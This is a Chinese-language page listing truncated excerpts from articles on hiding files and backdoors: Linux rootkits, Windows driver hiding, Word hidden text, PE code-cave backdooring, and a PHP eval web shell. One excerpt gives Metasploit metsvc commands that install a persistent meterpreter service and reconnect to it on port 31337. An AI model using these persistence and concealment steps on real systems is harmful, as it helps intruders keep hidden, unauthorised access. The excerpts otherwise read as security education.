目录 简介 linux虚拟文件系统VFS rootkit的功能 隐藏文件 基本方法 高级方法 系统调用流程 hook sys_getdents sys_getdents的调用树 最底层的方法 隐藏进程 日志修改 @ 简介 Rootkit是一套工具,用于长期获取root权限以及隐藏自己和后门程序.攻击者通过漏洞临时获得root权限后,一般会安装后门和rootkit,以便长期获取权限.收集信息. linux虚拟文件系统VFS 虚拟文件系统(Virtual File System, 简称 VFS),…

原作者:Bypass 原文链接:转自Bypass微信公众号 0x00 前言 攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术. 0x01 隐藏文件 Linux 下创建一个隐藏文件: touch .test.txt touch 命令可以创建一个文件,文件名前面加一个 点 就代表是隐藏文件,如下图: 一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹,查看Linux下的隐藏文件需要用到命令:ls -al 这里,我…

边学习边更新这专题,随手记录一下用到的思路,给自己看的(所以读者看可能有些懵,不好意思...) RootKit随手记(一)RootKit的驱动隐藏.读取配置.卸载安装 一.驱动隐藏 1. 隐藏原理 一款好的ROOTKIT一定会隐藏自己,检测驱动时经过一串链表,该链表的结点在 DRIVER_OBJECT->DriverSection 中,数据结构如下图. kd> dt _DRIVER_OBJECT ntdll!_DRIVER_OBJECT   +0x000 Type             :…

简单的word 信息隐藏技术分为两种 一  利用word自带的功能对信息进行隐藏,即选中要隐藏的文字 单击右键 选择字体  给隐藏选项打勾即可    这种信息隐藏比较简单  找到的方式为单机文件——找到word选项 ——在word选项里面找到显示——在隐藏文字的前面打勾就可以看见 二  word  excel都可以将后缀名改成rar  打开之后如图所示 而我们则可以将信息隐藏在这里面的文件夹内   既不影响文件的正常使用  还可以做到文件的信息隐藏…

在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普. AD: 0×00前言 在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普. 以PHP-WEBBACKDOOR为例,抛砖引玉 一个最常见的一句话后门可能写作这样 <?php @eval($…

“真正”隐藏文件 使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性.存档文件属性.只读文件属性和隐藏文件属性. attrib +s +a +h +r c:\test 这样就做到了真正的隐藏,不管你是否显示隐藏文件,此文件夹都看不见 破解隐藏文件: 打开电脑文件夹选项卡,取消”隐藏受保护的操作系统文件“勾选,把”隐藏文件和文件夹“下面的单选选择“显示隐藏的文件.文件夹和驱动器”. 再次查看,可以看到半透明的文件夹. 系统文件夹图标 1.建一个文件夹,假设叫 “我的电…

一.利用word本身自带的文字隐藏功能 1.在word中输入文字 2.选中文字,单击右键,选择字体选项 3.单击字体选项后,单击隐藏,确定 查找隐藏信息 1.单击左上角WPS文字后,选择选项按钮单击 2.单击显示,随后在隐藏文字的小框选中 二.office2013以后的版本中,有一个功能,即将office文件后缀名改为压缩格式(rar,zip),随后打开文件可以看到很多文件,而且这些是可以打开的 如:word中有图片,则可以直接在压缩包中找出来 原理; 1.在word中放入图片 2.保存后,将w…

写在前面的话 这篇文章将介绍使用codecaves对PE文件植入后门代码.有几个很好的工具可以帮到你了.比如BackdoorFactory和Shelter将完成相同的工作,甚至绕过一些静态分析几个防病毒. 开始 让我们理解一些术语: PE文件: 可移植可执行文件(PE)格式是可执行文件,目标代码和DLL的文件格式,用于32位和64位版本的Windows操作系统. Code Cave: 根据维基百科介绍 : “Code Cave是进程内存中的一系列空字节.进程内存中的Code Cave通常是对代码…

在meterpreter中执行:run metsvc -A 如此以后便会自动在服务器当中多生成一个meterpreter的服务,并且是开机自动启动.所以二次如果要利用直接: use exploit/mutil/handlerset payload windows/metsvc_bind_tcpset lhost x.x.x.xset lport 31337set rhost x.x.x.xexploit…

0. 引言 0x1: Linux系统攻防思想 在linux下进行"进程kill"和"进程保护"的总体思路有以下几个,我们围绕这几个核心思想展开进行研究 . 直接从外部杀死目标进程 . 进入到目标进程内部,从内部杀死.毁坏目标进程 . 劫持目标进程的正常启动.执行流程,从而杀死进程 . 利用系统原生的机制来"命令"进程结束 . 从内核态进程进程杀死 对于系统级攻防的对抗,我们需要明白,如果防御者和攻击者所处的层次维度是相同的(Ring3 again…